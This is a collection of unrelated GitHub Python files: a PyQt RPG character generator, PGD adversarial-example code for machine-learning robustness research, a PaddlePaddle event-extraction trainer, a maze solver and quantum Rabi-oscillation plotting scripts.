abilityModifierWidgets.append(QLabel(parseModifiers(abilitiesModifiers[i])))\r\n abLayout.addWidget(abilityNameWidgets[i],i+1,0,1,1)\r\n abLayout.addWidget(abilityDescriptionWidgets[i],i+1,1,1,1)\r\n abLayout.addWidget(abilityModifierWidgets[i],i+1,2,1,1)\r\n \r\n abLayout.addWidget(abTitle,0,0,1,1)\r\n abLayout.addWidget(abDesc,0,1,1,1)\r\n abLayout.addWidget(abMod,0,2,1,1)\r\n ### STATS\r\n statsWrapperLayout = QHBoxLayout()\r\n statsWrapperContainer = QWidget()\r\n statsWrapperContainer.setLayout(statsWrapperLayout)\r\n \r\n statsLayout = QGridLayout()\r\n statsContainer = QWidget()\r\n statsContainer.setLayout(statsLayout)\r\n \r\n statsSTR = QLabel(\"Strength\")\r\n statsDEX = QLabel(\"Dexterity\")\r\n statsCON = QLabel(\"Constitution\")\r\n statsINT = QLabel(\"Intelligence\")\r\n statsWIS = QLabel(\"Wisdom\")\r\n statsCHA = QLabel(\"Charisma\")\r\n \r\n baseSTR = QLabel(str(startingStats[0]))\r\n baseDEX = QLabel(str(startingStats[1]))\r\n baseCON = QLabel(str(startingStats[2]))\r\n baseINT = QLabel(str(startingStats[3]))\r\n baseWIS = QLabel(str(startingStats[4]))\r\n baseCHA = QLabel(str(startingStats[5]))\r\n \r\n maxSTR = QLabel(str(maxStats[0]))\r\n maxDEX = QLabel(str(maxStats[1]))\r\n maxCON = QLabel(str(maxStats[2]))\r\n maxINT = QLabel(str(maxStats[3]))\r\n maxWIS = QLabel(str(maxStats[4]))\r\n maxCHA = QLabel(str(maxStats[5]))\r\n \r\n baseTitle = QLabel(\"Min\")\r\n maxTitle = QLabel(\"Max\")\r\n \r\n statsLayout.addWidget(statsSTR,1,0,1,1)\r\n statsLayout.addWidget(statsDEX,2,0,1,1)\r\n statsLayout.addWidget(statsCON,3,0,1,1)\r\n statsLayout.addWidget(statsINT,4,0,1,1)\r\n statsLayout.addWidget(statsWIS,5,0,1,1)\r\n statsLayout.addWidget(statsCHA,6,0,1,1)\r\n \r\n statsLayout.addWidget(baseSTR,1,1,1,1)\r\n statsLayout.addWidget(baseDEX,2,1,1,1)\r\n statsLayout.addWidget(baseCON,3,1,1,1)\r\n statsLayout.addWidget(baseINT,4,1,1,1)\r\n statsLayout.addWidget(baseWIS,5,1,1,1)\r\n statsLayout.addWidget(baseCHA,6,1,1,1)\r\n \r\n statsLayout.addWidget(maxSTR,1,2,1,1)\r\n statsLayout.addWidget(maxDEX,2,2,1,1)\r\n statsLayout.addWidget(maxCON,3,2,1,1)\r\n statsLayout.addWidget(maxINT,4,2,1,1)\r\n statsLayout.addWidget(maxWIS,5,2,1,1)\r\n statsLayout.addWidget(maxCHA,6,2,1,1)\r\n \r\n statsLayout.addWidget(baseTitle,0,1,1,1)\r\n statsLayout.addWidget(maxTitle,0,2,1,1)\r\n statsLayout.setHorizontalSpacing(20)\r\n statsLayout.setVerticalSpacing(0)\r\n \r\n statsWrapperLayout.addWidget(statsContainer)\r\n statsWrapperLayout.addStretch()\r\n ### CLOSE BUTTON\r\n closeButtonLayout = QHBoxLayout()\r\n closeButtonContainer = QWidget()\r\n closeButtonContainer.setLayout(closeButtonLayout)\r\n \r\n closeButton = QPushButton(\"Exit\")\r\n closeButton.setFixedSize(100,25)\r\n closeButton.clicked.connect(self.close)\r\n closeButtonLayout.addStretch()\r\n closeButtonLayout.addWidget(closeButton)\r\n ### MAIN LAYOUT\r\n mainLayout.addWidget(upperContainer)\r\n mainLayout.addWidget(abContainer)\r\n mainLayout.addWidget(statsWrapperContainer)\r\n mainLayout.addWidget(closeButtonContainer)\r\n self.setLayout(mainLayout)\r\n\r\n\r\nclass showHeritageInfoWindow(QDialog):\r\n def __init__(self,parent=None,file=None):\r\n super(showHeritageInfoWindow, self).__init__(parent) \r\n self.setFixedWidth(600)\r\n self.file = file\r\n race = self.file[\"race\"]\r\n heritage = self.file[\"heritage\"]\r\n self.setWindowTitle(heritage)\r\n \r\n maxLayout = QHBoxLayout()\r\n \r\n main2Widget = QWidget()\r\n main2Layout = QVBoxLayout()\r\n main2Widget.setLayout(main2Layout)\r\n \r\n mainWidget = QWidget()\r\n mainLayout = QGridLayout()\r\n mainWidget.setLayout(mainLayout)\r\n main2Layout.addWidget(mainWidget)\r\n main2Layout.addStretch()\r\n \r\n rightWidget=QWidget()\r\n rightLayout = QVBoxLayout()\r\n rightWidget.setLayout(rightLayout)\r\n \r\n nameLabel = QLabel(\"Name:\")\r\n nameLabel.setAlignment(Qt.AlignTop)\r\n descLabel = QLabel(\"Description:\")\r\n descLabel.setAlignment(Qt.AlignTop)\r\n modifiersLabel = QLabel(\"Modifiers:\")\r\n modifiersLabel.setAlignment(Qt.AlignTop)\r\n mainLayout.addWidget(nameLabel,0,0,1,1)\r\n mainLayout.addWidget(descLabel,1,0,1,1)\r\n mainLayout.addWidget(modifiersLabel,2,0,1,1)\r\n \r\n nameVal = info[\"races\"][race][\"heritages\"][heritage][\"name\"]\r\n descVal = info[\"races\"][race][\"heritages\"][heritage][\"description\"]\r\n modifiersVal = info[\"races\"][race][\"heritages\"][heritage][\"modifiers\"]\r\n nameValLabel = QLabel(nameVal)\r\n nameValLabel.setAlignment(Qt.AlignLeft)\r\n descValLabel = QLabel(descVal)\r\n descValLabel.setAlignment(Qt.AlignLeft)\r\n descValLabel.setWordWrap(True)\r\n modifiersValLabel = QLabel(parseModifiers(modifiersVal))\r\n modifiersValLabel.setAlignment(Qt.AlignLeft)\r\n \r\n mainLayout.addWidget(nameValLabel,0,1,1,1)\r\n mainLayout.addWidget(descValLabel,1,1,1,1)\r\n mainLayout.addWidget(modifiersValLabel,2,1,1,1)\r\n \r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n raceImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n imageContainer.setFixedWidth(300)\r\n pixmap = QPixmap(info[\"races\"][race][\"heritages\"][heritage][\"image\"])\r\n raceImage.setPixmap(pixmap)\r\n \r\n imageLayout.addWidget(raceImage)\r\n \r\n closeButtonLayout = QHBoxLayout()\r\n closeButtonContainer = QWidget()\r\n closeButtonContainer.setLayout(closeButtonLayout)\r\n \r\n closeButton = QPushButton(\"Exit\")\r\n closeButton.setFixedSize(100,25)\r\n closeButton.clicked.connect(self.close)\r\n closeButtonLayout.addStretch()\r\n closeButtonLayout.addWidget(closeButton)\r\n \r\n rightLayout.addWidget(imageContainer)\r\n rightLayout.addWidget(closeButtonContainer)\r\n \r\n maxLayout.addWidget(main2Widget)\r\n maxLayout.addWidget(rightWidget)\r\n \r\n self.setLayout(maxLayout)\r\n \r\n \r\n \r\nclass statSelectBox(QComboBox):\r\n def __init__(self,parent=None,stats=None):\r\n super(statSelectBox,self).__init__(parent)\r\n self.activated.connect(lambda: self.parent().parent().parent().parent().parent().update_file(show_update=False))\r\n if stats == \"Any\" or stats == \"Any Physical\":\r\n self.addItem(\"Strength\")\r\n self.addItem(\"Dexterity\")\r\n self.addItem(\"Constitution\")\r\n if stats == \"Any\" or stats == \"Any Mental\":\r\n self.addItem(\"Intelligence\")\r\n self.addItem(\"Wisdom\")\r\n self.addItem(\"Charisma\")\r\n \r\n def text(self):\r\n return str(self.currentText())\r\n \r\n def getIndex(self,text):\r\n i = 0\r\n while i < 6:\r\n if self.itemText(i) == text:\r\n return i\r\n else:\r\n i += 1\r\n \r\nclass traitContainer(QFrame):\r\n def __init__(self,parent=None,category=None,trait=None):\r\n super(traitContainer,self).__init__(parent)\r\n traitDict = info[\"traits\"][category][trait]\r\n # self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)\r\n # self.setLineWidth(2)\r\n self.selected=False\r\n self.setFixedHeight(120)\r\n self.setFixedWidth(245)\r\n self.prerequisites_met = False\r\n self.trait_acquired = False\r\n self.category = category\r\n self.trait = trait\r\n self.setStyleSheet(\"background-color: rgb(80, 80, 80);border-radius: 8px;\")\r\n if self.trait_acquired:\r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkGreen;\")\r\n elif not self.prerequisites_met: \r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkRed;\")\r\n self.layout = QGridLayout()\r\n title = QLabel(info[\"traits\"][category][trait][\"name\"])\r\n # title.setWeight()\r\n title.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;font:bold\")\r\n self.descContainer = QScrollArea()\r\n self.descContainer.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;border-radius:0px\")\r\n traitLabel = QLabel(trait)\r\n prerequisites = QLabel(\"\".join([\"Prerequisites: \",\"\".join(info[\"traits\"][self.category][self.trait][\"prerequisites\"])]))\r\n prerequisites.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n self.layout.addWidget(prerequisites,1,0,1,2)\r\n traitLabel.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n desc = QLabel(info[\"traits\"][category][trait][\"description\"])\r\n desc.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px\")\r\n desc.setWordWrap(True)\r\n self.layout.addWidget(title,0,0,1,1)\r\n self.layout.addWidget(traitLabel,0,1,1,1)\r\n self.descContainer.setWidget(desc)\r\n self.setLayout(self.layout)\r\n \r\n def update(self):\r\n self.prerequisites_met = self.checkPrerequisites()\r\n if self.selected:\r\n self.setStyleSheet(\"background-color:rgb(80,80,80);border-radius:8px;border:1px solid White;\")\r\n desc = QLabel(info[\"traits\"][self.category][self.trait][\"description\"])\r\n desc.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px\")\r\n desc.setWordWrap(True)\r\n modifs = QLabel(parseModifiers(info[\"traits\"][self.category][self.trait][\"modifiers\"]))\r\n modifs.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n self.layout.addWidget(self.descContainer,2,0,1,2)\r\n self.layout.addWidget(modifs,3,0,1,2)\r\n self.setFixedHeight(180)\r\n elif self.trait_acquired:\r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkGreen;\")\r\n elif not self.prerequisites_met: \r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkRed;\")\r\n else:\r\n self.setStyleSheet(\"background-color: rgb(80, 80, 80);border-radius: 8px;\")\r\n \r\n if not self.selected:\r\n self.setFixedHeight(120)\r\n self.layout.removeWidget(self.descContainer)\r\n self.descContainer.setParent(None)\r\n \r\n self.parent().adjustSize()\r\n\r\n def mousePressEvent(self,event):\r\n if event.button() == Qt.LeftButton:\r\n self.setStyleSheet(\"background-color:rgb(80,80,80);border-radius:8px;border:1px solid White;\")\r\n if self.selected:\r\n self.selected = False\r\n self.update()\r\n else:\r\n for trait in self.parent().parent().parent().parent().parent().parent().parent().parent().parent().parent().traitsInfoWidgets:\r\n if trait.selected:\r\n trait.selected = False\r\n trait.update()\r\n self.selected=True\r\n self.update()\r\n \r\n \r\n def checkPrerequisites(self):\r\n return True\r\n\r\ndef parseModifiers(modifiersDict):\r\n retnString = \"\"\r\n for i in modifiersDict:\r\n # print(info[\"modifiers\"][i])\r\n retnString = \"\".join([retnString,info[\"modifiers\"][i][\"name\"], \": \", \"%+5d\" %modifiersDict[i],\"\\n\"])\r\n return retnString\r\n\r\ndef parseStat(statString):\r\n try:\r\n return info[\"modifiers\"][statString][\"name\"]\r\n except:\r\n return statString\r\n \r\n\r\ndef deParseStat(statString):\r\n for key in info[\"modifiers\"].keys():\r\n if info[\"modifiers\"][key][\"name\"] == statString:\r\n return key\r\n\r\n\r\ndef getMainStatModif(statScore):\r\n return math.floor((statScore - 10)/2)\r\n\r\ndef parseProficiency(prof):\r\n if prof == 0:\r\n return \"\"\r\n elif prof == 1:\r\n return \"Proficiency\"\r\n elif prof == 2:\r\n return \"Expertise\"\r\n else:\r\n return \"\"\r\n \r\ndef getTotalModifier(modifiersList,attrString):\r\n total = 0\r\n for group in modifiersList:\r\n if attrString in group.keys():\r\n val = group[attrString]\r\n total += val\r\n return total\r\n\r\ndef genModifsDict(modifiersList):\r\n keys = []\r\n for group in modifiersList:\r\n for key in group.keys():\r\n if key not in keys:\r\n keys.append(key)\r\n modifsDict = dict()\r\n for key in keys:\r\n modifsDict[key] = 0\r\n for group in modifiersList:\r\n if key in group.keys():\r\n modifsDict[key] += group[key]\r\n return modifsDict\r\n \r\n \r\nif __name__ == '__main__':\r\n\r\n import sys\r\n\r\n app = QApplication(sys.argv)\r\n app.setStyle(\"Fusion\")\r\n dark_palette = QPalette()\r\n \r\n dark_palette.setColor(QPalette.Window, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.WindowText, Qt.white)\r\n dark_palette.setColor(QPalette.Base, QColor(25, 25, 25))\r\n dark_palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.ToolTipBase, Qt.white)\r\n dark_palette.setColor(QPalette.ToolTipText, Qt.white)\r\n dark_palette.setColor(QPalette.Text, Qt.white)\r\n dark_palette.setColor(QPalette.Button, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.ButtonText, Qt.white)\r\n dark_palette.setColor(QPalette.BrightText, Qt.red)\r\n dark_palette.setColor(QPalette.Link, QColor(42, 130, 218))\r\n dark_palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\r\n dark_palette.setColor(QPalette.HighlightedText, Qt.black)\r\n app.setPalette(dark_palette)\r\n app.setStyleSheet(\"QToolTip { color: #ffffff; background-color: #2a82da; border: 1px solid white; }\")\r\n\r\n root = Tk()\r\n root.withdraw()\r\n charGen = mainWindow()\r\n charGen.show()\r\n sys.exit(app.exec_()) \r\n","repo_name":"Cameron-Spence/abril-theia-character-gen","sub_path":"character-gen.py","file_name":"character-gen.py","file_ext":"py","file_size_in_byte":56921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20363425266","text":"from advertorch.attacks import LinfPGDAttack\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\ndef get_pgd_adversary(model, eps, num_iter, lr, rand_init, seed):\n\n adversary = LinfPGDAttack(model, loss_fn=nn.CrossEntropyLoss(reduction=\"sum\"), eps=eps, nb_iter=num_iter,\n rand_init=rand_init, eps_iter=lr, clip_min=0.0, clip_max=1.0)\n return adversary\n\n\ndef pgd_attack(model, input, target, eps, num_iter, lr, rand_init, seed):\n\n x = input.detach()\n\n if rand_init:\n x += torch.zeros_like(x).uniform_(-eps, eps)\n\n for i in range(num_iter):\n x.requires_grad_()\n with torch.enable_grad():\n logits = model(x)\n loss = F.cross_entropy(logits, target, size_average=False)\n grad = torch.autograd.grad(loss, [x])[0]\n x = x.detach() + lr * torch.sign(grad.detach())\n x = torch.min(torch.max(x, input - eps), input + eps)\n\n x = torch.clamp(x, 0, 1)\n\n return x\n","repo_name":"JEONGHYUN-LEE/APD","sub_path":"attacks.py","file_name":"attacks.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4705333517","text":"import paddle\nimport paddle.fluid as fluid\n\nimport data_reader\n\nimport my_model\nimport mymodel\n\nimport json\nimport os\nimport sys\n\nclass RcDataReader(object):\n def __init__(self,\n charemb_dict_path,\n wordemb_dict_path,\n postag_dict_path,\n label_dict_path,\n train_data_path,\n eval_data_path):\n self._charemb_dict_path = charemb_dict_path\n self._wordemb_dict_path = wordemb_dict_path\n self._postag_dict_path = postag_dict_path\n self._label_dict_path = label_dict_path\n self._train_data_path = train_data_path\n self._eval_data_path = eval_data_path\n\n self._dict_path_dict = {'charemb_dict': self._charemb_dict_path,\n 'wordemb_dict': self._wordemb_dict_path,\n 'postag_dict': self._postag_dict_path,\n 'label_dict': self._label_dict_path}\n\n for input_dict in [charemb_dict_path, wordemb_dict_path, postag_dict_path, label_dict_path, train_data_path,\n eval_data_path]:\n if not os.path.exists(input_dict):\n raise ValueError(\"%s not found.\" % input_dict)\n return\n\n self._feature_dict = {}\n self._feature_dict['charemb_dict'] = self._load_dict_from_file(self._dict_path_dict['charemb_dict'])\n self._feature_dict['postag_dict'] = self._load_dict_from_file(self._dict_path_dict['postag_dict'])\n self._feature_dict['wordemb_dict'] = self._load_dict_from_file(self._dict_path_dict['wordemb_dict'])\n self._feature_dict['label_dict'] = self._load_dict_from_file(self._dict_path_dict['label_dict'])\n\n self._UNK_IDX = 0\n\n\n\n def _load_dict_from_file(self, dict_path):\n \"\"\"\n Load vocabulary from file.\n \"\"\"\n return json.load(open(dict_path, mode='r', encoding='utf-8'))\n\n def _is_valid_input_data(self, dic):\n \"\"\"is the input data valid\"\"\"\n if \"text\" not in dic or \"postag\" not in dic or \\\n type(dic[\"postag\"]) is not list:\n return False\n for item in dic['postag']:\n if \"word\" not in item or \"pos\" not in item:\n return False\n return True\n\n def _get_feed_iterator(self, dic, need_input=False, need_label=True):\n # verify that the input format of each line meets the format\n if not self._is_valid_input_data(dic):\n print('Format is error', sys.stderr)\n return None\n sentence = dic['text']\n sentence_char_list = [char for char in sentence]\n sentence_term_list = []\n for postag in dic['postag']:\n word = postag['word']\n for char in word:\n sentence_term_list.append(word)\n sentence_pos_list = []\n for postag in dic['postag']:\n word = postag['word']\n pos = postag['pos']\n sentence_pos_list.append('B-' + pos)\n if len(word) == 2:\n sentence_pos_list.append('E-' + pos)\n elif len(word) > 2:\n for i in word[1: -1]:\n sentence_pos_list.append('I-' + pos)\n sentence_pos_list.append('E-' + pos)\n\n sentence_char_slot = [self._feature_dict['charemb_dict'][1].get(c, self._UNK_IDX) for c in sentence_char_list]\n sentence_emb_slot = [self._feature_dict['wordemb_dict'][1].get(w, self._UNK_IDX) \\\n for w in sentence_term_list]\n sentence_pos_slot = [self._feature_dict['postag_dict'][1].get(pos, self._UNK_IDX) \\\n for pos in sentence_pos_list]\n label_slot = [self._feature_dict['label_dict'][1]['O']] * len(sentence_term_list)\n subject = dic['subject']\n if subject != \"NaN\":\n index = sentence.find(subject)\n label_slot[index] = self._feature_dict[\"label_dict\"][1]['B-SUB']\n if len(subject) >= 2:\n for i in range(1, len(subject) - 1):\n label_slot[index + i] = self._feature_dict[\"label_dict\"][1]['I-SUB']\n label_slot[index + len(subject) - 1] = self._feature_dict[\"label_dict\"][1]['E-SUB']\n # verify that the feature is valid\n if len(sentence_emb_slot) == 0 or len(sentence_pos_slot) == 0 or len(sentence_char_list) == 0 \\\n or len(label_slot) == 0:\n return None\n # feature_slot = [sentence_emb_slot, sentence_pos_slot]\n # feature_slot = [sentence_char_slot, sentence_emb_slot, sentence_pos_slot]\n feature_slot = [sentence_char_slot]\n\n input_fields = json.dumps(dic, ensure_ascii=False).encode('utf-8')\n output_slot = feature_slot\n if need_input:\n output_slot = [input_fields] + output_slot\n if need_label:\n output_slot = output_slot + [label_slot]\n return output_slot\n\n def path_reader(self, data_path, need_input=False, need_label=True):\n \"\"\"Read data from data_path\"\"\"\n self._feature_dict['data_keylist'] = []\n def reader():\n \"\"\"Generator\"\"\"\n if os.path.isdir(data_path):\n input_files = os.listdir(data_path)\n for data_file in input_files:\n data_file_path = os.path.join(data_path, data_file)\n for dic in json.load(open(data_file_path.strip(), mode='r', encoding='utf-8')):\n sample_result = self._get_feed_iterator(dic, need_input, need_label)\n if sample_result is None:\n continue\n yield tuple(sample_result)\n elif os.path.isfile(data_path):\n for dic in json.load(open(data_path.strip(), mode='r', encoding='utf-8')):\n sample_result = self._get_feed_iterator(dic, need_input, need_label)\n if sample_result is None:\n continue\n yield tuple(sample_result)\n\n return reader\n\n def get_train_reader(self, need_input=False, need_label=True):\n \"\"\"Data reader during training\"\"\"\n return self.path_reader(self._train_data_path, need_input, need_label)\n\n def get_test_reader(self, need_input=True, need_label=True):\n \"\"\"Data reader during test\"\"\"\n return self.path_reader(self._eval_data_path, need_input, need_label)\n\n def get_dict_size(self, dict_name):\n \"\"\"Return dict length\"\"\"\n if dict_name not in self._feature_dict:\n raise ValueError(\"dict name %s not found.\" % (dict_name))\n return len(self._feature_dict[dict_name][0])\n\ndef train(data_reader, use_cuda=True):\n\n char = fluid.layers.data(name='char_data', shape=[1], dtype='int64', lod_level=1)\n word = fluid.layers.data(name='word_data', shape=[1], dtype='int64', lod_level=1)\n postag = fluid.layers.data(name='token_pos', shape=[1], dtype='int64', lod_level=1)\n\n target = fluid.layers.data(name='target', shape=[1], dtype='int64', lod_level=1)\n\n feature_out = my_model.db_lstm(data_reader, char, word, postag)\n # feature_out = mymodel.db_lstm(char)\n\n mix_hidden_lr = 1e-3\n crf_cost = fluid.layers.linear_chain_crf(\n input=feature_out,\n label=target,\n param_attr=fluid.ParamAttr(name='crfw', learning_rate=mix_hidden_lr))\n avg_cost = fluid.layers.mean(crf_cost)\n\n # optimizer\n sgd_optimizer = fluid.optimizer.AdamOptimizer(learning_rate=1e-3)\n\n sgd_optimizer.minimize(avg_cost)\n\n crf_decode = fluid.layers.crf_decoding(input=feature_out, param_attr=fluid.ParamAttr(name='crfw'))\n\n train_batch_reader = paddle.batch(\n paddle.reader.shuffle(data_reader.get_train_reader(), buf_size=8192),\n batch_size=500)\n\n place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()\n\n feeder = fluid.DataFeeder(feed_list=[char, word, postag, target], place=place)\n # feeder = fluid.DataFeeder(feed_list=[char, target], place=place)\n exe = fluid.Executor(place)\n\n def train_loop(main_program):\n exe.run(fluid.default_startup_program())\n\n for epoch_id in range(50):\n cost_sum, cost_count = 0.0, 0.0\n for data in train_batch_reader():\n cost = exe.run(main_program, feed=feeder.feed(data), fetch_list=[avg_cost])[0]\n cost_sum += cost\n cost_count += 1\n print(\"Epoch \", epoch_id, \",Train cost:\", cost_sum / cost_count)\n\n train_loop(fluid.default_main_program())\n\nif __name__ == '__main__':\n data_generator = RcDataReader(\n charemb_dict_path='../dict/char_dict',\n wordemb_dict_path='../dict/word_dict',\n postag_dict_path='../dict/postag_dict',\n label_dict_path='../dict/label_dict',\n train_data_path='../data/train_data.json',\n eval_data_path='../data/train_data.json')\n\n train(data_generator)\n","repo_name":"qchj20131252/financial_event_extraction","sub_path":"bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11049641899","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef readMaze():\n file_name = sys.argv[1]\n f = open(file_name, 'r')\n maze = f.read().split('\\n')\n f.close()\n for line in maze:\n if len(line) == 0:\n maze.remove(line)\n return maze\n\n\ndef findStart(maze):\n for i in [0, -1]:\n if ' ' in maze[i]:\n return (maze[i].index(' '), maze.index(maze[i]))\n for line in maze:\n for i in [0, len(line) - 1]:\n if line[i] == ' ':\n return (i, maze.index(line))\n\n\ndef findGoal(maze, start):\n for i in [0, -1]:\n if ' ' in maze[i] and \\\n (maze[i].index(' '), maze.index(maze[i])) != start:\n return (maze[i].index(' '), maze.index(maze[i]))\n for line in maze:\n for i in [0, len(line) - 1]:\n if line[i] == ' ' and (i, maze.index(line)) != start:\n return (i, maze.index(line))\n\n\ndef findPath(maze, start):\n direction = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n queue = [[start]]\n checked = set(start)\n way = []\n while queue:\n path = queue.pop(0)\n last_x, last_y = path[-1]\n if (last_x, last_y) == findGoal(maze, start):\n way.append(path)\n\n for d in direction:\n x, y = last_x + d[0], last_y + d[1]\n if (\n 0 <= x < len(maze[0]) and 0 <= y < len(maze) and\n maze[y][x] != '*' and (x, y) not in checked\n ):\n queue.append(path + [(x, y)])\n checked.add((x, y))\n return way\n\n\nif len(sys.argv) != 2:\n raise IOError('No file included.')\navailable = set()\nmaze = readMaze()\nstart = findStart(maze)\npath = findPath(maze, start)\nfor i in path:\n for ele in i:\n available.add(ele)\nfor y in range(len(maze)):\n for x in range(len(maze[y])):\n if (x, y) not in available and maze[y][x] == ' ':\n maze[y] = maze[y][:x] + '*' + maze[y][x+1:]\nfor i in maze:\n print(i)\n","repo_name":"imdangodaane/dead_end","sub_path":"dead_end.py","file_name":"dead_end.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14868295958","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\n\n#def DQRabi_frqdiff(t, rabi, detun):\n# #rabi *= 2*np.pi\n# detun *= 2*np.pi\n# alpha = (2**0.5)*rabi*(2*np.pi)\n# k = (alpha**2 + 4*detun**2)**0.5\n\n# term1 = (4*detun**2*((alpha**2*(k - 2*detun)**2)/(alpha**2 - 2*(k - 2*detun)*detun)**2 + (alpha**2*(k + 2*detun)**2)/((alpha**2 + 4*detun**2)*(alpha**2 + 4*detun*(k + 2*detun))))*np.cos((k*t)/2))/(alpha**2 *(1 + (4*detun**2)/alpha**2))\n# term2 = (alpha**4*(k - 2*detun)**4)/(4*(alpha**2 - 2*(k - 2*detun)*detun)**4) + (16*detun**4)/(alpha**4 *(1 + (4 *detun**2)/alpha**2)**2) + (alpha**4 *(k + 2 *detun)**4)/(4 *(alpha**2 + 4* detun**2)**2 *(alpha**2 + 4 *detun *(k + 2 *detun))**2)\n# term3 = (alpha**4 *(k**2 - 4 *detun**2)**2 *np.cos((k *t)))/(2 *(alpha**2 -2* (k - 2* detun)* detun)**2 *(alpha**2 + 4* detun**2)* (alpha**2 + 4* detun* (k + 2* detun)))\n\n# return (term1+term2+term3), term1, term3, term2\n\n#def DQRabi_frqdiff(t, rabi, detun):\n# detun *= 2*np.pi\n# alpha = (2**0.5)*rabi*(2*np.pi)\n# k = (alpha**2 + 4*detun**2)**0.5\n#\n# term1 = np.cos((k *t))*alpha**4/2/((alpha**2 + 4*detun**2)**2)\n# term2 = np.cos((k *t/2))*8*alpha**2 * detun**2 /((alpha**2 + 4*detun**2)**2)\n# term3 = (alpha**4 + 32*detun**4)/2/((alpha**2 + 4*detun**2)**2)\n\n# return (term1+term2+term3), term2, term1, term3\n\n\ndef DQRabi_frqdiff(t, sqrabi, detun):\n detun *= 2*np.pi\n sqrabi *= 2*np.pi\n \n freqwd = ((2*detun**2 + sqrabi**2)/2)**0.5\n return ((2*detun**2 + sqrabi**2 * np.cos(freqwd * t))/(2*detun**2 + sqrabi**2))**2\n\ndef get_DQhalfpi(rabi, detun):\n alpha = (2**0.5)*rabi*(2*np.pi)\n k = (alpha**2 + 4*(detun*2*np.pi)**2)**0.5\n t = np.linspace(0, 2*np.pi*10/k, 10000)\n termtot = DQRabi_frqdiff(t, rabi, detun)\n idx_mins = find_peaks(termtot*(-1))[0]\n t_mins = t[idx_mins]\n pop_mins = termtot[idx_mins]\n #plt.plot(t_mins, pop_mins, 'o')\n #plt.plot(t, termtot, ':')\n #plt.show()\n \n return t_mins\n\ndef DQRabi_frqcomm(t, rabi, detun):\n rabi *= 2*np.pi\n detun *= 2*np.pi\n k = (2*rabi**2 + detun**2)**0.5\n\n denom = detun**2 + 2*rabi**2\n numer = rabi**2 + detun**2 + (rabi**2)*np.cos(k *t)\n\n return numer/denom\n\n\n\n\n\n# \n# Delete - redundant ABC comparisons\n#\ndef make_ABCplots():\n import seaborn as sns\n plotpalette = sns.hls_palette(16, l=.4, s=.8).as_hex()\n\n arr_SQrabi = np.linspace(0.1, 5, 1000)\n arr_terms = []\n for rabi in arr_SQrabi:\n termfinal, B, A, C = DQRabi_frqdiff(0, rabi, 1.515)\n arr_terms.append(np.asarray([termfinal, A, B, C]))\n arr_terms = np.array(arr_terms)\n\n fig, axs = plt.subplots(3)\n fig.suptitle('$A, B, C$ for Various Drive Strengths $\\Omega$\\n Differential Detunings $\\Delta= 1.515$ MHz', fontsize = 25)\n\n #axs[0].plot(arr_SQrabi, arr_terms[:,0], 'rx:', label='$|c_0(t)|^2$')\n\n axs[0].plot(arr_SQrabi, arr_terms[:,1], '-', c=plotpalette[0], lw=3, label='$A$')\n axs[0].set_ylabel('$A$', fontsize=20)\n axs[0].axvline(2.14, c= 'k', ls=':', lw=2, label = '$\\Omega_F = 2.14$ MHz')\n axs[0].legend(loc=4, fontsize=16)\n\n axs[1].plot(arr_SQrabi, arr_terms[:,2], '-', c=plotpalette[0], lw=3, label='$B$')\n axs[1].set_ylabel('$B$', fontsize=20)\n axs[1].axvline(2.14, c= 'k', ls=':', lw=2)\n axs[1].legend(loc=4, fontsize=16)\n\n #axs[2].plot(arr_SQrabi, arr_terms[:,3], 'k-', lw=2, label='$C$')\n #axs[2].set_ylabel('$C$', fontsize=20)\n #axs[2].axvline(2.14, c= 'k', ls=':', lw=2)\n #axs[2].legend(loc=4, fontsize=16)\n #axs[2].set_xlabel('Drive Strength $\\Omega$', fontsize=20)\n\n axs[2].plot(arr_SQrabi, arr_terms[:,1]-arr_terms[:,2]+arr_terms[:,3], 'k-', lw=3, label='$A-B+C$')\n axs[2].axvline(2.14, c= 'k', ls=':', lw=2)\n axs[2].legend(loc=4, fontsize=16)\n axs[2].set_xlabel('Drive Strength $\\Omega$', fontsize=20)\n\n for ax in axs:\n ax.label_outer()\n fig.tight_layout()\n fig.subplots_adjust(top=.84)\n\n plt.savefig('./Figures/Magic Rabi Paper Plots/ABC.png', dpi=100, bbox_inches='tight')\n\n plt.show()\n\n#arr_t = np.linspace(0,.5,100)\n#arr_detunings = np.array([1.515])#np.linspace(0, 10, 11)\n#for idx_detun in np.arange(arr_detunings.size):\n# plt.figure(idx_detun)\n# rabi = 2.15\n# detuning = arr_detunings[idx_detun]\n# 